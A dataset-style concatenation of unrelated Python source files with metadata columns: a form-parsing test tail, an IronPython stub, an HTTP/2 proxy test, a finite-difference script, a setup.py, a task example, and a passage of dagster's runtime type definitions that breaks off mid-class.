assert len(forms[1].checkbutton["topping"]) == 3 # 3 buttons
##########################################################################
# FORM 2
# form[2] has 2 comboboxes (SELECT) and 2 buttons (INPUT)
assert len(list(forms[2].select.keys())) == 2
assert len(list(forms[2].input.keys())) == 2
# testing comboboxes:
assert len(forms[2].select["what-to-do"]["options"]) == 5
assert forms[2].select["what-to-do"]["options"][0] == "Drink Coffee"
assert len(forms[2].select["who-to-do-it-with"]["options"]) == 6
assert forms[2].select["who-to-do-it-with"]["options"][-1] == "Chouck"
##########################################################################
# FORM 3
# form[3] has 3 textareas (TEXTAREA) and 2 buttons (INPUT)
print(forms[3].textarea)
assert len(list(forms[3].textarea.items())) == 3
assert len(forms[3].input) == 2
# testing textareas:
assert forms[3].textarea["positive"]["cols"] == "60"
assert forms[3].textarea["positive"]["rows"] == "20"
assert forms[3].textarea["username"]["text"][0] == "Your Name Here"
harness = testplus.TestHarness(
__name__,
funs=testplus.testcollect(globals()),
)
if __name__ == "__main__":
print(harness)
sys.exit(len(harness))
| 34.550562 | 83 | 0.556748 | true | true | |
f73283969bf30cb0fc5192375960b26d761e5a1f | 3,088 | py | Python | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/Windows/Forms/__init___parts/TableLayoutCellPaintEventHandler.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class TableLayoutCellPaintEventHandler(MulticastDelegate, ICloneable, ISerializable):
"""
Represents the method that will handle the System.Windows.Forms.TableLayoutPanel.CellPaint event.
TableLayoutCellPaintEventHandler(object: object,method: IntPtr)
"""
def BeginInvoke(self, sender, e, callback, object):
""" BeginInvoke(self: TableLayoutCellPaintEventHandler,sender: object,e: TableLayoutCellPaintEventArgs,callback: AsyncCallback,object: object) -> IAsyncResult """
pass
def CombineImpl(self, *args):
"""
CombineImpl(self: MulticastDelegate,follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self, *args):
"""
DynamicInvokeImpl(self: Delegate,args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current
delegate.-or- null,if the method represented by the current delegate does not require
arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass
def EndInvoke(self, result):
""" EndInvoke(self: TableLayoutCellPaintEventHandler,result: IAsyncResult) """
pass
def GetMethodImpl(self, *args):
"""
GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self, sender, e):
""" Invoke(self: TableLayoutCellPaintEventHandler,sender: object,e: TableLayoutCellPaintEventArgs) """
pass
def RemoveImpl(self, *args):
"""
RemoveImpl(self: MulticastDelegate,value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to
the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance,then a new System.Delegate without
value in its invocation list; otherwise,this instance with its original invocation list.
"""
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self, object, method):
""" __new__(cls: type,object: object,method: IntPtr) """
pass
def __reduce_ex__(self, *args):
pass
| 29.409524 | 221 | 0.680376 | class TableLayoutCellPaintEventHandler(MulticastDelegate, ICloneable, ISerializable):
def BeginInvoke(self, sender, e, callback, object):
pass
def CombineImpl(self, *args):
pass
def DynamicInvokeImpl(self, *args):
pass
def EndInvoke(self, result):
pass
def GetMethodImpl(self, *args):
pass
def Invoke(self, sender, e):
pass
def RemoveImpl(self, *args):
pass
def __init__(self, *args):
pass
@staticmethod
def __new__(self, object, method):
pass
def __reduce_ex__(self, *args):
pass
| true | true |
f73283aa4b808065d101ef22fa6cf7432a504266 | 1,531 | py | Python | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | test/autests/gold_tests/http2/http2.test.py | dragon512/proxy-verifier | d48d680bb5a2540af3c2cdc2968a4c1bef7546e1 | [
"Apache-2.0"
] | null | null | null | '''
Verify basic HTTP/2 functionality.
'''
# @file
#
# Copyright 2020, Verizon Media
# SPDX-License-Identifier: Apache-2.0
#
Test.Summary = '''
Verify basic HTTP/2 functionality.
'''
#
# Test 1: Verify correct behavior of a single HTTP/2 transaction.
#
r = Test.AddTestRun("Verify HTTP/2 processing of a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/single_transaction",
https_ports=[4443], other_args="--verbose diag")
server = r.AddServerProcess("server1", "replay_files/single_transaction",
https_ports=[4444], other_args="--verbose diag")
proxy = r.AddProxyProcess("proxy1", listen_port=4443, server_port=4444,
use_ssl=True, use_http2_to_1=True)
if Condition.IsPlatform("darwin"):
proxy.Streams.stdout = "gold/single_transaction_proxy.gold_macos"
client.Streams.stdout = "gold/single_transaction_client.gold_macos"
server.Streams.stdout = "gold/single_transaction_server.gold_macos"
else:
proxy.Streams.stdout = "gold/single_transaction_proxy.gold"
client.Streams.stdout = "gold/single_transaction_client.gold"
server.Streams.stdout = "gold/single_transaction_server.gold"
client.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
server.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
| 37.341463 | 79 | 0.713912 |
Test.Summary = '''
Verify basic HTTP/2 functionality.
'''
r = Test.AddTestRun("Verify HTTP/2 processing of a single HTTP transaction")
client = r.AddClientProcess("client1", "replay_files/single_transaction",
https_ports=[4443], other_args="--verbose diag")
server = r.AddServerProcess("server1", "replay_files/single_transaction",
https_ports=[4444], other_args="--verbose diag")
proxy = r.AddProxyProcess("proxy1", listen_port=4443, server_port=4444,
use_ssl=True, use_http2_to_1=True)
if Condition.IsPlatform("darwin"):
proxy.Streams.stdout = "gold/single_transaction_proxy.gold_macos"
client.Streams.stdout = "gold/single_transaction_client.gold_macos"
server.Streams.stdout = "gold/single_transaction_server.gold_macos"
else:
proxy.Streams.stdout = "gold/single_transaction_proxy.gold"
client.Streams.stdout = "gold/single_transaction_client.gold"
server.Streams.stdout = "gold/single_transaction_server.gold"
client.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
server.Streams.stdout += Testers.ExcludesExpression(
"Violation:",
"There should be no verification errors because there are none added.")
| true | true |
f73284f572868ccb38a791c5403e5082b6b22e6b | 1,386 | py | Python | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | 17abriledp.py | mecanimatico/codigo_edp | 42080a4eb0f604873f9743ff0d0b8afde0735181 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 09:57:12 2020
@author: Heber
"""
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
#%% valor exacto d ela derivada
up = np.cos(1.0)
h = 0.1
up_aprox = (np.sin(1+h)-np.sin(1))/h
error = up - up_aprox
print ("Valor aproximado: ",up_aprox)
print ("Valor del error: ",error)
#%%-----------------------------
# muestra
list = [0.1, 0.01, 0.001, 0.0001, 0.00001]
aprox_values = []
errores_values = []
# aproximacion a la segunda derivada
errores_values2 = []
aprox_values2 = []
for h in list:
aux = (np.sin(1+h) - np.sin(1))/h
aprox_values.append(aux)
errores_values.append(up - aux)
# print(h, up_aprox,error)
# formula de segundo orden
aux_2 = (np.sin(1+h)-np.sin(1-h))/(2*h)
aprox_values2.append(aux_2)
errores_values2.append(up - aux_2)
plt.loglog(list,errores_values,'o-',list,errores_values2,'o-')
plt.grid(True)
#%%---------------------
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
list = [0.1, 0.01, 0.001, 0.0001]
valor_exacto = 6*np.exp(1.0)
valor_aprox = []
valor_error = []
for h in list:
aux = (np.exp((1+h)**2)-2*np.exp(1.0) + np.exp((1-h)**2))/h**2
valor_aprox.append(aux)
aux2 = abs(valor_exacto - aux)
valor_error.append(aux2)
plt.grid(True)
plt.loglog(list,valor_error,'o-')
#list,valor_aprox, 'o-'
| 21.323077 | 66 | 0.626984 |
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
up = np.cos(1.0)
h = 0.1
up_aprox = (np.sin(1+h)-np.sin(1))/h
error = up - up_aprox
print ("Valor aproximado: ",up_aprox)
print ("Valor del error: ",error)
list = [0.1, 0.01, 0.001, 0.0001, 0.00001]
aprox_values = []
errores_values = []
errores_values2 = []
aprox_values2 = []
for h in list:
aux = (np.sin(1+h) - np.sin(1))/h
aprox_values.append(aux)
errores_values.append(up - aux)
aux_2 = (np.sin(1+h)-np.sin(1-h))/(2*h)
aprox_values2.append(aux_2)
errores_values2.append(up - aux_2)
plt.loglog(list,errores_values,'o-',list,errores_values2,'o-')
plt.grid(True)
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
list = [0.1, 0.01, 0.001, 0.0001]
valor_exacto = 6*np.exp(1.0)
valor_aprox = []
valor_error = []
for h in list:
aux = (np.exp((1+h)**2)-2*np.exp(1.0) + np.exp((1-h)**2))/h**2
valor_aprox.append(aux)
aux2 = abs(valor_exacto - aux)
valor_error.append(aux2)
plt.grid(True)
plt.loglog(list,valor_error,'o-')
| true | true |
f73287eee23516b86d7a58a9027c13d6bae3f980 | 993 | py | Python | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 71 | 2016-01-04T22:32:27.000Z | 2022-03-25T07:57:54.000Z | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 288 | 2015-12-09T23:40:31.000Z | 2021-02-02T00:32:00.000Z | doc/sphinxext/setup.py | celiafish/scikit-xray | 660a37821d58544b6443c5b8cd9c96daef577ed2 | [
"BSD-3-Clause"
] | 53 | 2015-12-10T14:35:17.000Z | 2021-06-24T13:36:00.000Z | from distutils.core import setup
import setuptools
import sys
import os
version = "0.3.dev"
setup(
name="numpydoc",
packages=["numpydoc"],
package_dir={"numpydoc": ""},
version=version,
description="Sphinx extension to support docstrings in Numpy format",
# classifiers from http://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=["Development Status :: 3 - Alpha",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Topic :: Documentation"],
keywords="sphinx numpy",
author="Pauli Virtanen and others",
author_email="pav@iki.fi",
url="http://projects.scipy.org/numpy/browser/trunk/doc/sphinxext",
license="BSD",
zip_safe=False,
install_requires=["Sphinx >= 0.5"],
package_data={'numpydoc': 'tests', '': ''},
entry_points={
"console_scripts": [
"autosummary_generate = numpydoc.autosummary_generate:main",
],
},
)
| 30.090909 | 77 | 0.629406 | from distutils.core import setup
import setuptools
import sys
import os
version = "0.3.dev"
setup(
name="numpydoc",
packages=["numpydoc"],
package_dir={"numpydoc": ""},
version=version,
description="Sphinx extension to support docstrings in Numpy format",
classifiers=["Development Status :: 3 - Alpha",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Topic :: Documentation"],
keywords="sphinx numpy",
author="Pauli Virtanen and others",
author_email="pav@iki.fi",
url="http://projects.scipy.org/numpy/browser/trunk/doc/sphinxext",
license="BSD",
zip_safe=False,
install_requires=["Sphinx >= 0.5"],
package_data={'numpydoc': 'tests', '': ''},
entry_points={
"console_scripts": [
"autosummary_generate = numpydoc.autosummary_generate:main",
],
},
)
| true | true |
f73289685bd37aa689ba66d97e917694c4fc2fa7 | 1,147 | py | Python | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | 35 | 2020-12-22T11:36:46.000Z | 2021-12-03T15:49:41.000Z | remake/examples/ex8.py | markmuetz/remake | a3c5098be57b60b01ffaa4a7fcb937f9337dcdea | [
"Apache-2.0"
] | null | null | null | """Demonstrates partial run when some input data not there.
"""
from remake import Remake, TaskRule
ex8 = Remake()
class CannotRun(TaskRule):
rule_inputs = {'in1': 'data/inputs/input_not_there.txt'}
rule_outputs = {'out': 'data/inputs/ex8_in1.txt'}
def rule_run(self):
input_text = self.inputs['in1'].read_text()
self.outputs['out'].write_text(input_text + '\n')
class CanRun1(TaskRule):
rule_inputs = CannotRun.rule_outputs
rule_outputs = {'out1': 'data/outputs/ex8/out1.txt',
'out2': 'data/outputs/ex8/out2.txt'}
def rule_run(self):
for o in self.outputs.values():
o.write_text('out')
class CanRun2(TaskRule):
rule_inputs = {'in': 'data/outputs/ex8/out{i}.txt'}
rule_outputs = {'out1': 'data/outputs/ex8/out2.{i}.txt'}
var_matrix = {'i': [1, 2]}
def rule_run(self):
assert len(self.inputs) == len(self.outputs)
for i, o in zip(self.inputs.values(), self.outputs.values()):
o.write_text('\n'.join([f'f1 {line}' for line in i.read_text().split('\n')[:-1]]) + '\n')
if __name__ == '__main__':
ex8.finalize()
| 28.675 | 101 | 0.617262 | from remake import Remake, TaskRule
ex8 = Remake()
class CannotRun(TaskRule):
rule_inputs = {'in1': 'data/inputs/input_not_there.txt'}
rule_outputs = {'out': 'data/inputs/ex8_in1.txt'}
def rule_run(self):
input_text = self.inputs['in1'].read_text()
self.outputs['out'].write_text(input_text + '\n')
class CanRun1(TaskRule):
rule_inputs = CannotRun.rule_outputs
rule_outputs = {'out1': 'data/outputs/ex8/out1.txt',
'out2': 'data/outputs/ex8/out2.txt'}
def rule_run(self):
for o in self.outputs.values():
o.write_text('out')
class CanRun2(TaskRule):
rule_inputs = {'in': 'data/outputs/ex8/out{i}.txt'}
rule_outputs = {'out1': 'data/outputs/ex8/out2.{i}.txt'}
var_matrix = {'i': [1, 2]}
def rule_run(self):
assert len(self.inputs) == len(self.outputs)
for i, o in zip(self.inputs.values(), self.outputs.values()):
o.write_text('\n'.join([f'f1 {line}' for line in i.read_text().split('\n')[:-1]]) + '\n')
if __name__ == '__main__':
ex8.finalize()
| true | true |
f73289beadbbd779b42062ae2dd20756a3a1975e | 18,377 | py | Python | python_modules/dagster/dagster/core/types/runtime.py | cclauss/dagster | 6494edbfd52526812aadf941bf90edf3ade1d912 | [
"Apache-2.0"
] | 1 | 2019-07-15T17:34:04.000Z | 2019-07-15T17:34:04.000Z | python_modules/dagster/dagster/core/types/runtime.py | stevencasey/dagster | 1881f67f55725c40432dbc1ed99b8cfbd9629600 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/core/types/runtime.py | stevencasey/dagster | 1881f67f55725c40432dbc1ed99b8cfbd9629600 | [
"Apache-2.0"
] | null | null | null | from functools import partial
import six
from dagster import check
from dagster.core.storage.type_storage import TypeStoragePlugin
from .builtin_enum import BuiltinEnum
from .builtin_config_schemas import BuiltinSchemas
from .config import ConfigType
from .config import List as ConfigList
from .config import Nullable as ConfigNullable
from .config_schema import InputHydrationConfig, OutputMaterializationConfig
from .marshal import SerializationStrategy, PickleSerializationStrategy
from .dagster_type import check_dagster_type_param
from .wrapping import WrappingListType, WrappingNullableType
def check_opt_config_cls_param(config_cls, param_name):
    '''Validate that config_cls is None or a class subclassing ConfigType.

    Returns config_cls unchanged on success; raises through the check module
    on violation.
    '''
    if config_cls is not None:
        check.invariant(isinstance(config_cls, type))
        check.param_invariant(issubclass(config_cls, ConfigType), param_name)
    return config_cls
class RuntimeType(object):
    '''
    The class backing DagsterTypes as they are used during execution.

    RuntimeType subclasses are singletons: construct them via the inst()
    classmethod, never by calling the constructor directly (the constructor
    enforces this by failing if the subclass is already cached).
    '''

    def __init__(
        self,
        key,
        name,
        is_builtin=False,
        description=None,
        input_hydration_config=None,
        output_materialization_config=None,
        serialization_strategy=None,
        auto_plugins=None,
    ):
        # Enforce the singleton-per-subclass contract: direct construction of
        # an already-cached subclass is a programming error.
        type_obj = type(self)
        if type_obj in RuntimeType.__cache:
            check.failed(
                (
                    '{type_obj} already in cache. You **must** use the inst() class method '
                    'to construct RuntimeType and not the ctor'.format(type_obj=type_obj)
                )
            )

        # key uniquely identifies the type; name is the (optional) display name.
        self.key = check.str_param(key, 'key')
        self.name = check.opt_str_param(name, 'name')
        self.description = check.opt_str_param(description, 'description')
        # Optional schema for hydrating a value of this type from config.
        self.input_hydration_config = check.opt_inst_param(
            input_hydration_config, 'input_hydration_config', InputHydrationConfig
        )
        # Optional schema for materializing values of this type from config.
        self.output_materialization_config = check.opt_inst_param(
            output_materialization_config,
            'output_materialization_config',
            OutputMaterializationConfig,
        )
        # Defaults to pickle-based serialization when none is supplied.
        self.serialization_strategy = check.opt_inst_param(
            serialization_strategy,
            'serialization_strategy',
            SerializationStrategy,
            PickleSerializationStrategy(),
        )

        auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)

        # Every auto plugin must be a TypeStoragePlugin subclass (storage-aware
        # serialization hooks).
        check.param_invariant(
            all(
                issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins
            ),
            'auto_plugins',
        )

        self.auto_plugins = auto_plugins

        self.is_builtin = check.bool_param(is_builtin, 'is_builtin')

    # Singleton cache mapping RuntimeType subclass -> instance. Name-mangled,
    # so it is only reachable as RuntimeType._RuntimeType__cache externally.
    __cache = {}

    @classmethod
    def inst(cls):
        # Lazily construct and cache the singleton instance for this subclass.
        if cls not in RuntimeType.__cache:
            RuntimeType.__cache[cls] = cls()  # pylint: disable=E1120
        return RuntimeType.__cache[cls]

    @staticmethod
    def from_builtin_enum(builtin_enum):
        # _RUNTIME_MAP is defined elsewhere in this module; presumably it maps
        # each BuiltinEnum member to its RuntimeType instance.
        check.invariant(BuiltinEnum.contains(builtin_enum), 'must be member of BuiltinEnum')
        return _RUNTIME_MAP[builtin_enum]

    @property
    def display_name(self):
        # Note: may be None, since name is optional.
        return self.name

    def type_check(self, value):
        # Base implementation accepts every value; subclasses override and
        # raise Failure on mismatch.
        pass

    # The is_* flags below are overridden by the relevant subclasses
    # (Anyish, scalars, list/nullable wrappers, Nothing).

    @property
    def is_any(self):
        return False

    @property
    def is_scalar(self):
        return False

    @property
    def is_list(self):
        return False

    @property
    def is_nullable(self):
        return False

    @property
    def inner_types(self):
        # Composite types (list/nullable) override to expose wrapped types.
        return []

    @property
    def is_nothing(self):
        return False
class BuiltinScalarRuntimeType(RuntimeType):
    '''Base class for the builtin scalar runtime types (Int, String, Path, Float, Bool).

    Derives both key and display name from the concrete subclass name and
    marks the type as builtin.
    '''

    def __init__(self, *args, **kwargs):
        # The subclass name doubles as the type key and the display name.
        cls_name = type(self).__name__
        super(BuiltinScalarRuntimeType, self).__init__(
            key=cls_name, name=cls_name, is_builtin=True, *args, **kwargs
        )

    @property
    def is_scalar(self):
        '''Always True: builtin scalars are, by definition, scalar.'''
        return True
class Int(BuiltinScalarRuntimeType):
    '''Builtin integer type; accepts any py2/py3 integer (six.integer_types).'''

    def __init__(self):
        super(Int, self).__init__(
            output_materialization_config=BuiltinSchemas.INT_OUTPUT,
            input_hydration_config=BuiltinSchemas.INT_INPUT,
        )

    def type_check(self, value):
        # Imported lazily to avoid a circular import at module load time.
        from dagster.core.definitions.events import Failure

        if isinstance(value, six.integer_types):
            return
        raise Failure(_typemismatch_error_str(value, 'int'))
def _typemismatch_error_str(value, expected_type_desc):
return 'Value "{value}" of python type "{python_type}" must be a {type_desc}.'.format(
value=value, python_type=type(value).__name__, type_desc=expected_type_desc
)
def _throw_if_not_string(value):
    '''Raise Failure unless value is a py2/py3 string; no-op otherwise.'''
    # Lazy import avoids a circular dependency with the events module.
    from dagster.core.definitions.events import Failure

    if isinstance(value, six.string_types):
        return
    raise Failure(_typemismatch_error_str(value, 'string'))
class String(BuiltinScalarRuntimeType):
    '''Builtin string type; values must be py2/py3 strings.'''

    def __init__(self):
        super(String, self).__init__(
            output_materialization_config=BuiltinSchemas.STRING_OUTPUT,
            input_hydration_config=BuiltinSchemas.STRING_INPUT,
        )

    def type_check(self, value):
        # Shares the string check with Path, which is string-backed.
        _throw_if_not_string(value)
class Path(BuiltinScalarRuntimeType):
    '''Builtin path type; represented as a string at runtime.'''

    def __init__(self):
        super(Path, self).__init__(
            output_materialization_config=BuiltinSchemas.PATH_OUTPUT,
            input_hydration_config=BuiltinSchemas.PATH_INPUT,
        )

    def type_check(self, value):
        # Paths are plain strings, so reuse the shared string check.
        _throw_if_not_string(value)
class Float(BuiltinScalarRuntimeType):
    '''Builtin float type.

    NOTE(review): the check is strictly isinstance(value, float), so integer
    values are rejected rather than coerced — presumably intentional; confirm
    against callers before relaxing.
    '''

    def __init__(self):
        super(Float, self).__init__(
            output_materialization_config=BuiltinSchemas.FLOAT_OUTPUT,
            input_hydration_config=BuiltinSchemas.FLOAT_INPUT,
        )

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        if isinstance(value, float):
            return
        raise Failure(_typemismatch_error_str(value, 'float'))
class Bool(BuiltinScalarRuntimeType):
    '''Builtin boolean type; only True/False pass the check.'''

    def __init__(self):
        super(Bool, self).__init__(
            output_materialization_config=BuiltinSchemas.BOOL_OUTPUT,
            input_hydration_config=BuiltinSchemas.BOOL_INPUT,
        )

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        if isinstance(value, bool):
            return
        raise Failure(_typemismatch_error_str(value, 'bool'))
class Anyish(RuntimeType):
    '''Common base for Any-like runtime types.

    Inherits the no-op type check from RuntimeType, so every value passes;
    subclasses only customize identity and config schemas.
    '''

    def __init__(
        self,
        key,
        name,
        input_hydration_config=None,
        output_materialization_config=None,
        is_builtin=False,
        description=None,
    ):
        super(Anyish, self).__init__(
            key=key,
            name=name,
            description=description,
            is_builtin=is_builtin,
            input_hydration_config=input_hydration_config,
            output_materialization_config=output_materialization_config,
        )

    @property
    def is_any(self):
        '''Marks this type (and subclasses) as Any-like.'''
        return True
class Any(Anyish):
    '''The builtin Any type: accepts every value, with passthrough schemas.'''

    def __init__(self):
        super(Any, self).__init__(
            key='Any',
            name='Any',
            is_builtin=True,
            input_hydration_config=BuiltinSchemas.ANY_INPUT,
            output_materialization_config=BuiltinSchemas.ANY_OUTPUT,
        )
def define_any_type(name, description=None):
    '''Factory producing a named Any-ish RuntimeType subclass.

    The returned class closes over name and description; it is instantiated
    through the standard RuntimeType.inst() machinery like any other type.
    '''

    class NamedAnyType(Anyish):
        def __init__(self):
            super(NamedAnyType, self).__init__(
                key=name, name=name, description=description
            )

    return NamedAnyType
class Nothing(RuntimeType):
    '''Builtin unit type used to sequence steps without passing data.

    The only valid runtime value is None; there is no config hydration or
    materialization for Nothing.
    '''

    def __init__(self):
        super(Nothing, self).__init__(
            key='Nothing',
            name='Nothing',
            input_hydration_config=None,
            output_materialization_config=None,
            is_builtin=True,
        )

    @property
    def is_nothing(self):
        # Marker consulted by the execution machinery for Nothing handling.
        return True

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        if value is not None:
            # Bug fix: the original raised the literal string
            # 'Value {value} must be None.' without formatting it, so the
            # placeholder was never interpolated. Format in the actual value
            # (str.format, not f-strings, to preserve py2 compatibility).
            raise Failure('Value {value} must be None.'.format(value=value))
class PythonObjectType(RuntimeType):
    '''Runtime type whose check is an isinstance test against a python class.

    Optionally invokes typecheck_metadata_fn on values that pass the check,
    returning its result (e.g. metadata for the type-check event).
    '''

    def __init__(self, python_type, key=None, name=None, typecheck_metadata_fn=None, **kwargs):
        # Name defaults to the subclass name; key defaults to the name.
        name = check.opt_str_param(name, 'name', type(self).__name__)
        key = check.opt_str_param(key, 'key', name)
        super(PythonObjectType, self).__init__(key=key, name=name, **kwargs)
        self.python_type = check.type_param(python_type, 'python_type')
        self.typecheck_metadata_fn = check.opt_callable_param(
            typecheck_metadata_fn, 'typecheck_metadata_fn'
        )

    def type_check(self, value):
        from dagster.core.definitions.events import Failure

        expected = self.python_type
        if not isinstance(value, expected):
            raise Failure(
                'Value {value} should be of type {type_name}.'.format(
                    value=value, type_name=expected.__name__
                )
            )

        metadata_fn = self.typecheck_metadata_fn
        if metadata_fn:
            return metadata_fn(value)
def define_python_dagster_type(
    python_type,
    name=None,
    description=None,
    input_hydration_config=None,
    output_materialization_config=None,
    serialization_strategy=None,
    auto_plugins=None,
    typecheck_metadata_fn=None,
):
    '''Define a dagster type whose type check is an ``isinstance`` test.

    The dagster type system is very flexible, and the body of a type check can
    be a function that does anything (for that level of flexibility, inherit
    from RuntimeType directly). However it is very common to want a dagster
    type whose only check is against a python type:

        DateTime = define_python_dagster_type(datetime.datetime, name='DateTime')

    Args:
        python_type (cls): The python type to check values against.
        name (Optional[str]): Name of the dagster type.
            NOTE(review): despite the original docs, when omitted the name
            falls back to the generated class's name (via PythonObjectType),
            not to ``python_type.__name__`` -- confirm intended behavior.
        description (Optional[str]): Description of the type.
        input_hydration_config (Optional[InputHydrationConfig]): An instance of
            a class that inherits from :py:class:`InputHydrationConfig` that
            can map config data to a value of this type.
        output_materialization_config (Optional[OutputMaterializationConfig]):
            An instance of a class that inherits from
            :py:class:`OutputMaterializationConfig` that can map config data to
            persisting values of this type.
        serialization_strategy (Optional[SerializationStrategy]): The default
            behavior for how to serialize this value for persisting between
            execution steps.
        auto_plugins (Optional[List[type]]): Types that *must* subclass from
            TypeStoragePlugin. Allows a type to specify serialization that
            depends on the storage used for intermediates, when a
            serialization_strategy is insufficient because specialized API
            calls are needed (e.g. calling an s3 API directly instead of using
            a generic file object). See dagster_pyspark.DataFrame.
        typecheck_metadata_fn (Optional[Callable]): Called with the value when
            a type check succeeds, to emit a metadata (TypeCheck) event
            describing it. See dagster_pandas.DataFrame for an example.
    '''
    check.type_param(python_type, 'python_type')
    check.opt_str_param(name, 'name')
    check.opt_str_param(description, 'description')
    check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig)
    check.opt_inst_param(
        output_materialization_config, 'output_materialization_config', OutputMaterializationConfig
    )
    # NOTE(review): the defaulted return value is discarded here, so this call
    # is validation-only; RuntimeType.__init__ re-applies the pickle default.
    check.opt_inst_param(
        serialization_strategy,
        'serialization_strategy',
        SerializationStrategy,
        default=PickleSerializationStrategy(),
    )
    auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type)
    check.param_invariant(
        all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins),
        'auto_plugins',
    )
    check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn')
    # Closure-based subclass: captures all arguments and participates in the
    # RuntimeType.inst() singleton protocol.
    class _ObjectType(PythonObjectType):
        def __init__(self):
            super(_ObjectType, self).__init__(
                python_type=python_type,
                name=name,
                description=description,
                input_hydration_config=input_hydration_config,
                output_materialization_config=output_materialization_config,
                serialization_strategy=serialization_strategy,
                auto_plugins=auto_plugins,
                typecheck_metadata_fn=typecheck_metadata_fn,
            )
    return _ObjectType
def _create_nullable_input_schema(inner_type):
    """Wrap ``inner_type``'s input schema so that None is also accepted.
    Returns None when the inner type has no input hydration config.
    """
    if not inner_type.input_hydration_config:
        return None
    nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst()
    class _NullableSchema(InputHydrationConfig):
        @property
        def schema_type(self):
            return nullable_type
        def construct_from_config_value(self, context, config_value):
            # None short-circuits; anything else is delegated to the inner
            # type's own hydration.
            if config_value is None:
                return None
            return inner_type.input_hydration_config.construct_from_config_value(
                context, config_value
            )
    return _NullableSchema()
class NullableType(RuntimeType):
    """Runtime type accepting either None or a value of ``inner_type``."""
    def __init__(self, inner_type):
        key = 'Optional.' + inner_type.key
        super(NullableType, self).__init__(
            key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type)
        )
        self.inner_type = inner_type
    @property
    def display_name(self):
        # Rendered as e.g. 'Int?'.
        return self.inner_type.display_name + '?'
    def type_check(self, value):
        # None is always valid; otherwise defer to the wrapped type.
        return None if value is None else self.inner_type.type_check(value)
    @property
    def is_nullable(self):
        return True
    @property
    def inner_types(self):
        # Direct inner type plus its transitive inner types.
        return [self.inner_type] + self.inner_type.inner_types
def _create_list_input_schema(inner_type):
    """Build an input schema hydrating a config list element-wise via
    ``inner_type``'s schema; returns None when the inner type has none.
    """
    if not inner_type.input_hydration_config:
        return None
    list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst()
    class _ListSchema(InputHydrationConfig):
        @property
        def schema_type(self):
            return list_type
        def construct_from_config_value(self, context, config_value):
            # Hydrate each element with the inner type, carrying the context.
            convert_item = partial(
                inner_type.input_hydration_config.construct_from_config_value, context
            )
            return list(map(convert_item, config_value))
    return _ListSchema()
class ListType(RuntimeType):
    """Runtime type for a homogeneous list of ``inner_type`` values."""
    def __init__(self, inner_type):
        key = 'List.' + inner_type.key
